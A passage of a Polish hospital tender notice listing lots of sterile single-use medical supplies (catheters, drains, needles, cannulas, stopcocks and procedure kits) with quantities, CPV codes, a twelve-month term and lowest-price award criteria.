<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE  NR 8 
Cewnik moczowodowy - wymagania jakościowe, typ i rozmiar zgodnie z opisem 
1. Cewnik moczowodowy - podwójny PIGTAIL - sterylny rozmiar 7F/26  - 20 szt.
2. Cewnik moczowodowy - podwójny PIGTAIL - sterylny rozmiar 7F/28  - 20	szt.
3. Cewnik moczowodowy - podwójny PIGTAIL - sterylny rozmiar 6F/28
(dopuszcza się rozmiar 6F/30)  - 20 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.12.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> PAKIET III  SPRZĘT J.U. STERYLNY - CEWNIKI MOCZOWODOWE 
Zadanie nr 9.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE  NR 9 
Cewnik moczowodowy typ Nelaton - typ i rozmiar zgodnie z opisem, długość 70 cm, podziałka min. co 1 cm, widoczny w RTG, wyposażony w metalową prowadnicę 
1. Cewnik moczowodowy - NELATON - sterylny rozmiar 4F  - 70 szt. 	
2. Cewnik moczowodowy - NELATON - sterylny rozmiar 5F  - 150 szt. 	
3. Cewnik moczowodowy - NELATON - sterylny rozmiar 6F  - 20 szt. 	 
4. Cewnik moczowodowy - NELATON - sterylny rozmiar 7F  - 10 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.12.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> PAKIET IV SPRZĘT J.U. STERYLNY  - CEWNIKI DO EMBOLEKTOMI
Zadanie nr 10.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE  NR  10
Cewnik do  embolektomii z balonem  - koniec dystalny ślepo zakończony, zaopatrzony w kontrast RTG, posiadający balonik lateksowy. Koniec proksymalny zakończony końcówką uniwersalną, kod długości  co 1 cm, oznaczenia barwne rozmiarów. Pakowany indywidualnie folia - papier.
1. Cewnik - sterylny  CH 4/ 80  - 40 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.12.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> PAKIET V  SPRZĘT J.U. STERYLNY  - CEWNIKI UROLOGICZNE 
Zadanie nr 11.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 11
Cewnik typ Foley - -plastikowa zastawka zaworu, poj. balonu ok. 5-15 ml   pakowane w wewnętrzny worek foliowy oraz zewnętrzne opakowanie folia-papier,   typ i rozmiar zgodnie z opisem	
1. Cewnik  silikonowany - FOLEY - sterylny CH 6   - 5 szt.	
2. Cewnik silikonowany -  FOLEY - sterylny CH  8  - 5 szt.	
3. Cewnik silikonowany -  FOLEY - sterylny CH 10  - 5 szt.	
4. Cewnik silikonowany -  FOLEY - sterylny CH 12  - 70 szt.	
5. Cewnik silikonowany -  FOLEY - sterylny CH 14  - 220 szt.	
6. Cewnik silikonowany  - FOLEY - sterylny CH 16  - 2260 szt.	
7. Cewnik silikonowany -  FOLEY - sterylny CH 18  - 2070 szt.	
8. Cewnik silikonowany -  FOLEY - sterylny CH 20  - 210 szt.	
9. Cewnik silikonowany -  FOLEY - sterylny CH 22  - 60 szt.	
10. Cewnik silikonowany -  FOLEY - sterylny CH 24  - 20 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.12.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> PAKIET V  SPRZĘT J.U. STERYLNY  - CEWNIKI UROLOGICZNE 
Zadanie nr 12.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 12 
Cewnik typ Nelaton  - typ i rozmiar zgodnie z opisem	
1. Cewnik urologiczny - NELATON - sterylny CH 6    - 10 szt.	
2. Cewnik urologiczny - NELATON - sterylny CH 10  - 10 szt.
3. Cewnik urologiczny - NELATON - sterylny CH 12  - 10 szt.	
4. Cewnik urologiczny - NELATON - sterylny CH 14  - 100 szt.	
5. Cewnik urologiczny - NELATON - sterylny CH 16  - 100 szt.	
6. Cewnik urologiczny - NELATON - sterylny CH 18  - 60 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.12.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> PAKIET VI  SPRZĘT J.U. STERYLNY  - DRENY I POJEMNIKI DO ODSYSANIA RAN
Zadanie nr 13.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 13
Dren brzuszny - wymagania jakościowe, typ i rozmiar zgodnie z opisem; powierzchnia drenu pokryta silikonem, właściwości zabezpieczające przed zaciśnięciem podczas zgięcia drenu, sterylny, widoczny w  RTG, koniec dystalny drenu zakończony centralnym otworem. Otwory boczne  ułożone w dwu prostopadłych do siebie płaszczyznach	
1. Dren brzuszny silikonowy, giętki, miękki - sterylny 24F/40  - 100 szt.
2. Dren brzuszny silikonowy, giętki, miękki - sterylny 30F/40  - 80 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.16.40-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> PAKIET VI  SPRZĘT J.U. STERYLNY  - DRENY I POJEMNIKI DO ODSYSANIA RAN 
Zadanie nr 14.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 14 
Dren do odsysania ran -  wymagania jakościowe, typ i rozmiar zgodnie z  opisem.  Dren do odsysania typ Redon  - sterylny, elastyczny z nitką RTG, koniec dystalny drenu zakończony centralnym otworem. Otwory boczne  ułożone w dwu prostopadłych do  siebie płaszczyznach, nie ulegający zamknięciu podczas zagięcia, gwarantujący długotrwały drenaż. Pakowane podwójnie w wewnętrzny worek foliowy oraz zewnętrzne opakowanie folia - papier.  	
1. Dren do odsysania ran - REDON - sterylny 10F/70  - 120 szt.	
2. Dren do odsysania ran - REDON - sterylny 12F/70  - 240 szt.	
3. Dren do odsysania ran - REDON - sterylny 14F/70  - 120 szt.
4. Dren do odsysania ran - REDON - sterylny 16F/70  - 60 szt.	
5. Dren do odsysania ran - REDON - sterylny 18F/70  - 120 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.16.40-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> PAKIET VI  SPRZĘT J.U. STERYLNY  - DRENY I POJEMNIKI DO ODSYSANIA RAN
Zadanie 15.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 15
Pojemnik do odsysania ran - Wymagania jakościowe, typ i rozmiar zgodnie z opisem. Pojemnik do odsysania w kształcie płaskiej butelki z częściową
harmonijką - jednorazowego użytku, sterylny. Pojemność 250 ml.
Kompatybilny z drenami do odsysania w zamawianych rozmiarach. 		
1. Pojemnik do odsysania ran typ REDON 250 ml  - 1300 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.16.40-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> PAKIET VII  SPRZĘT J.U. STERYLNY  - SPRZĘT ANESTEZJOLOGICZNY 
Zadanie nr 16.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 16
Filtry - jałowe, złącze z rurką standardowe,  minimalne wymagania jakościowe, typ i rozmiar zgodnie z opisem		
1. Filtr mechaniczny - jałowy z wydzieloną  celulozową warstwą wymiennika ciepła i wilgoci, charakteryzujący się utratą wilgoci nie większą niż 6 mg  H2O/1l przy  zadanej objętości oddechowej VT-500 ml, skuteczności filtracji 99,9999 %. Wymagana dokumentacja potwierdzająca w/w wymagane parametry.  - 450 szt
2. Filtr elektrostatyczny bez wymiennika ciepła i wilgoci o objętości oddechowej    25 - 100 ml waga około 8 g	- 50 szt.	
3. Filtr elektrostatyczny z wymiennikiem ciepła i wilgoci o objętości oddechowej  75 - 300 ml   - 25 szt.	
4. Filtr elektrostatyczny bez wymiennika ciepła i wilgoci o objętości oddechowej 150 - 1200 ml  - 1350 szt.	
  5.	Wymiennik ciepła i wilgoci - tzw. sztuczny nos - do rurek tracheotomijnych, jednoelementowy z portem do podawania tlenu	szt.	300.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.17.11.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 20 <b>NAZWA:</b> PAKIET VIII  SPRZĘT J.U. STERYLNY  - IGŁY MEDYCZNE 
Zadanie nr 17.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE  NR 17  
Igła do trepanobiopsji - minimalne wymagania jakościowe, typ i rozmiar zgodnie z opisem   11G/10 cm   - 150 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.20-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 21 <b>NAZWA:</b> PAKIET VIII  SPRZĘT J.U. STERYLNY  - IGŁY MEDYCZNE 
Zadanie nr 18.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE  NR  
Igła do punkcji mostka dla dorosłych   - 250 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.20-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 22 <b>NAZWA:</b> PAKIET VIII  SPRZĘT J.U. STERYLNY  - IGŁY MEDYCZNE 
Zadanie nr 19.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE   NR 19 
Igły do penów - wykonane ze stali nierdzewnej, jednorazowego użytku, odporne na zginanie bez względu na kąt wprowadzania leku, kompatybilne do wszystkich typów wstrzykiwaczy opakowanie a100 szt.		
1. Igła do wstrzykiwania insuliny   0,33 x 12,7 mm    - 5 opak.	
2. Igła do wstrzykiwań insuliny 0,30 x 8 mm   - 1 opak..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.20-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 23 <b>NAZWA:</b> PAKIET VIII  SPRZĘT J.U. STERYLNY  - IGŁY MEDYCZNE
Zadanie nr 20.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 20 
Igły do znieczuleń typu PENCIL - POINT - typ i rozmiar zgodnie z opisem, igła prowadząca w zestawie, przeźroczysty rowkowany uchwyt umożliwiający wizualizację płynu mózgowo - rdzeniowego	
1. Igła do znieczuleń typ PENCIL - POINT   24G/90 mm   - 10 szt.
2. Igła do znieczuleń typ PENCIL - POINT   25G/90 mm   - 10 szt.	
3. Igła do znieczuleń typ PENCIL - POINT   26G/90 mm   - 360 szt.	
4. Igła do znieczuleń typ PENCIL - POINT   27G/90 mm   - 360 szt.	
5. Igła do znieczuleń typ PENCIL - POINT   25G/120 mm  - 10 szt.	
6. Igła do znieczuleń typ PENCIL - POINT   26G/120 mm  - 20 szt.	
7. Igła do znieczuleń typ PENCIL - POINT   27G/120 mm  - 20 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.20-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 24 <b>NAZWA:</b> PAKIET VIII  SPRZĘT J.U. STERYLNY  - IGŁY MEDYCZNE
Zadanie nr 21.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 21
Igły do znieczuleń typu STANDARD -  typ i rozmiar zgodnie z opisem, igła prowadząca w zestawie, przeźroczysty rowkowany uchwyt umożliwiający wizualizację płynu mózgowo - rdzeniowego 	
1. Igła typ STANDARD 18G/90 mm  - 150 szt.	
2. Igła typ STANDARD 20G/90 mm  - 100 szt.	
3. Igła typ STANDARD 22G/90 mm  - 200 szt.
4. Igła typ STANDARD 25G/90 mm  - 350 szt.	
5. Igła typ STANDARD 26G/90 mm  - 390 szt.	
6. Igła typ STANDARD 27G/90 mm  - 210 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.20-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 25 <b>NAZWA:</b> PAKIET VIII  SPRZĘT J.U. STERYLNY  - IGŁY MEDYCZNE 
Zadanie nr 22.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 22
Igły z mandrynem  do punkcji torbieli nerki  	
1. Igła 20G   dł.  20 cm  - 10 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.20-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 26 <b>NAZWA:</b> PAKIET VIII  SPRZĘT J.U. STERYLNY  - IGŁY MEDYCZNE 
Zadanie nr 23.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 23
Igły jednorazowego użytku iniekcyjne  - wykonane ze stali nierdzewnej, cienkościenne o zwiększonym świetle pozwalającym na uzyskanie wyższych
przepływów podczas iniekcji i pobierania leku. Typ i rozmiar zgodnie z opisem Opakowanie: a100 szt. 
1. Igła jednorazowego użytku   - a100  szt.  0,45 x 16  - 65 opak.	
2. Igła jednorazowego użytku   - a100  szt.  0,5 x 25   - 100 opak.	
3. Igła jednorazowego użytku  - a100  szt.  0,6 x 25   - 20 opak.	
4. Igła jednorazowego użytku  - a100  szt.  0,6 x 30   - 60 opak.	
5. Igła jednorazowego użytku  - a100  szt.  0,7 x 30   - 270 opak.	
6. Igła jednorazowego użytku  - a100  szt.  0,8 x 40   - 700 opak.	
7. Igła jednorazowego użytku  - a100  szt.  0,9 x 40   - 700 opak.	
8. Igła jednorazowego użytku  - a100  szt.  1,1 x 40   - 500 opak.	
9. Igła jednorazowego użytku  - a100  szt.  1,2 x 40   - 1600 opak..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.20-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 27 <b>NAZWA:</b> PAKIET IX  SPRZĘT J.U. STERYLNY - KANIULE I INNE 
Zadanie nr 24.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 24    	
1. Kaniula do długotrwałych wlewów 24G/19 mm z portem górnym; przepływ          18 ml/min. ; kolor kodu żółty, widoczne w USG	  - 2800 szt.	
2. Kaniula do długotrwałych wlewów dla noworodków 26G/ 19 mm; średnica zew./ dług.  0,6 x 19 mm; przepływ  13 ml/min; kolor kodu fioletowy. Widoczne w USG, zdejmowany uchwyt z podwójnie oczyszczonego PTFE   - 1300 szt.	
3. Kaniula do długotrwałych wlewów dla wcześniaka  24G, do wkłuć poniżej  1000 g wagi urodzeniowej; średnica zew../ dług.  0,7 x 19 mm; przepływ  13 ml/ min.; kolor kodu żółty. Widoczne w USG.   - 2300 szt.	
4. Kaniula do długotrwałych wlewów dla dorosłych  - korek samozamykający, min. 5
pasków widocznych w RTG, badanie wykorzystanego materiału na zakrzepowe
zapalenie żył 16 G; średnica zew./dług. 1,8 x 45 mm; przepływ  236 ml/min.; kolor kodu szary  - 100 szt.	
5. Kaniula do długotrwałych wlewów dla dorosłych - korek samozamykający, min. 5
pasków widocznych w RTG, badanie wykorzystanego materiału na zakrzepowe
zapalenie żył 17G; średnica zew./ dług.  1,5 x 45 mm; przepływ  133 ml/ min.; kolor kodu biały   - 100 szt.	
6. Kaniula do długotrwałych wlewów dla dorosłych -  korek samozamykający, min. 5
pasków widocznych w RTG, badanie wykorzystanego materiału na zakrzepowe
zapalenie żył  - 18G; średnica zew./ dług.  1,3 x 45 mm; przepływ 103 ml/ min.; kolor kodu zielony   - 3000 szt.
7. Kaniula do długotrwałych wlewów dla dorosłych - korek samozamykający, min. 5
pasków widocznych w RTG, badanie wykorzystanego materiału na zakrzepowe
zapalenie żył  - 20G; średnica zew. / dł.  1,1 x 33 mm; przepływ  67 ml/ min.; kolor kodu różowy   - 16500 szt.	
8. Kaniula do długotrwałych wlewów dla dorosłych - korek  samozamykający, min. 5
pasków widocznych w RTG, badanie wykorzystanego materiału na zakrzepowe
zapalenie żył - 22G; średnica zew./ dł. 0,9 x 25 mm; przepływ  42 ml/min.; kolor kodu niebieski  - 25000 szt.	
9. Koreczki do kaniul - standardowe, kompatybilne z oferowanymi kaniulami do długotrwałych wlewów dożylnych  - 120000 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.12.20-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 28 <b>NAZWA:</b> PAKIET X  SPRZĘT J.U. STERYLNY - KATETERY 
Zadanie nr 25.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 25
Katetery specjalistyczne - wymagania jakościowe:
- kateter (cewnik) do drenażu kl. piersiowej z trokarem, do odsysania powietrza i płynów z jamy opłucnej oraz zamkniętego drenażu międzyżebrowego - sterylizowany EO, opak. folia - papier, nietoksyczny, wykonany z PCV medycznej jakości, linia kontrastująca w promieniach RTG, umożliwiająca lokalizację w polu operac., optymalnie dobrana szerokość kateteru, aktywna część kateteru - perforowany odcinek - dwa otwory boczne, typ i rozmiar zgodnie z opisem.	
1. Kateter do drenażu kl. piersiowej  20F   - 10 szt. 	
2. Kateter do drenażu kl. piersiowej  24F   - 40 szt.	
3. Kateter do drenażu kl. piersiowej  28F   - 20 szt.	
4. Kateter do drenażu kl. piersiowej  32F   - 20 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 29 <b>NAZWA:</b> PAKIET X  SPRZĘT J.U. STERYLNY  - KATETERY
Zadanie nr 26.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 26 
Dwu lub jednokanałowy kateter - sterylny cewnik z poliuretanu z powłoką hydrofilną, kontrastujący w RTG, z zaciskiem i przezroczystą końcówką Luer - Lock. Opakowanie  folia - papier; nietoksyczny, apirogenny                    	
1. Kateter do kaniulacji dużych naczyń dwukanałowy - sterylny 4F x 15  - 5 szt.
2. Kateter do kaniulacji dużych naczyń jednokanałowy - sterylny 4F x 20 - 5 szt.
3. Kateter do kaniulacji dużych naczyń jednokanałowy - sterylny 6F x 20 - 5 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 30 <b>NAZWA:</b> PAKIET X  SPRZĘT J.U. STERYLNY  - KATETERY
Zadanie nr 30.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 27 	
1. Kateter do odsysania pola operacyjnego - sterylny z końcówką do zabiegów ortopedycznych dren długości 270-300 cm;,dwa filtry 3 wymienne końcówki pakowany w wewnętrzny worek foliowy oraz zewnętrzne opakowanie  folia - papier - 20 szt.	
2. Kateter do odsysania pola operacyjnego - sterylny; z końcówką, dren długości min.  300 cm. Uniwersalna lejkowata końcówka, umożliwiająca bezpieczny uchwyt. W miejscu uchwytu spłaszczona niegładka powierzchnia, końcówka z otworem służącym kontroli odsysania, koniec zaokrąglony; dren odporny na załamanie i skręcenie zakończony konektorem o obudowie schodkowej, co umożliwia łączenie z różnymi drenami ssaka. Pakowany w wewnętrzny worek foliowy oraz zewnętrzne opakowanie folia - papier  - 800 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 31 <b>NAZWA:</b> PAKIET XI  SPRZĘT J.U. DLA ENDOSKOPII - SPRZĘT DO BADAŃ ENDOSKOPOWYCH 
Zadanie nr 28.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 28   
1. Kateter do okluzji i ekstrakcji z balonem o pojemność 1,5 ml jałowy, po napełnieniu powietrzem, jednorazowego użytku  - 2800 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 32 <b>NAZWA:</b> PAKIET XII  SPRZĘT J.U. STERYLNY  - KRANIKI 
Zadanie nr 29.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 29
Kranik trójdrożny - zapewniający duże prędkości przepływu, przy niewielkiej przestrzeni martwej, czytelne oznaczenie barwne linii i wskaźników stanu zaworów, kompatybilny z oferowanymi kaniulami - może posiadać wyczuwalny indykator pozycji zamknięty/ otwarty; budowa - z poliwęglanu 	
1. Kranik trójdrożny bez przedłużacza   - 5850 szt.	
2. Kranik trójdrożny z przedłużaczem rozm. 10 - 15 cm   - 690 szt. 	
3. Kranik trójdrożny z przedłużaczem rozm. 7 - 15 cm   - 150 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 33 <b>NAZWA:</b> PAKIET XIII  SPRZĘT J. U. STERYLNY  - ZESTAWY MEDYCZNE
Zaadanie nr 30.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 30 Zestaw do cystostomii - cewnik Pigtail, dł. 45 cm, ostra igła rozrywalna, kołnierz do mocowania  cewnika,  sterylny do jednorazowego użycia.
1. Zestaw do cystostomii rozm. 12F  - 10 kpl..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.16.20-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 34 <b>NAZWA:</b> PAKIET XIII  SPRZĘT J.U. STERYLNY  - ZESTAWY MEDYCZNE 
Zadanie nr 31.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 31
1. Zestaw do drenażu biernego - sterylny - pojedyncza butla z podziałką i drenem -5 kpl.	
2. Zestaw do drenażu ssącego - sterylny - dwie butle: 1 większa + 1 mniejsza, z podziałką połączone ze sobą drenami  oraz dreny do butli, by połączyć z próżnią i z pacjentem   - 40 kpl..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.16.20-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 35 <b>NAZWA:</b> PAKIET XIII  SPRZĘT J.U. STERYLNY  - ZESTAWY MEDYCZNE
Zadanie nr 32.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 32 
Zestaw do kaniulacji dużych naczyń - typ i rozmiar zgodnie z opisem: cewnik z poliuretanu z powłoką hydrofilną, widoczny w RTG, igła do nakłucia naczynia           18G/80 mm, prowadnik z zakończeniem typu  J, rozszerzacz, skalpel, strzykawka, dodatkowe skrzydełka z zaciskiem do stabilizacji cewnika.	
1. Zestaw do kaniulacjii dużych naczyń dwukanałowy - sterylny 7F x 20cm - 5 szt. 2. Zestaw do kaniulacji dużych naczyń dwukanałowy - sterylny  7F x 15cm - 150 szt.
3. Zestaw do kaniulacji dużych naczyń trzykanałowy - sterylny  7F x 15cm - 5 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.16.20-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 36 <b>NAZWA:</b> PAKIET XIII  SPRZĘT J.U. STERYLNY  - ZESTAWY MEDYCZNE
Zadanie nr 33.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 33
Zestaw do nefrostomii wielostopniowej zawiera: cewnik z jednodrożnym kranikiem, dwuczęściową igłę punkcyjną, prowadnik Lunderquista 80cm,  rozszerzadło, łącznik bezlateksowy do podłączenia worka na mocz z mechanizmem obrotowym.	
1. Zestaw do nefrostomii p/ skórnej  - sterylny 9F (dopuszcza się 8F)   - 8 kpl.
2. Zestaw do nefrostomi  p/skórnej - sterylny 12F (dopuszcza się 10F)  - 10 kpl..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.16.20-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
